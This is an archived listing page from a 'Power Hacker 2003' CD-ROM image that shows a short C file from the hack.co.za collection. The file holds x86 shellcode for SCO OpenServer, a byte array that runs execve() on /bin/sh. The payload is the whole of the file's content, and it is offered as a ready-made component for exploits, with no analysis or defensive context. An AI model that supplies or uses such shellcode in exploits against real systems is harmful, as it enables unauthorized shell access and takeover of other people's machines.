home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / openserver / execve_binsh.c < prev    next >
Encoding:
Text File  |  2000-09-22  |  290 b   |  9 lines

  1. /*
  2.  *  Sco
  3.  *  execve() of /bin/sh by doble@iname.com
  4.  */
  5.  
  6. char hellcode[]=
  7.   "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  8.   "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  9.   "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";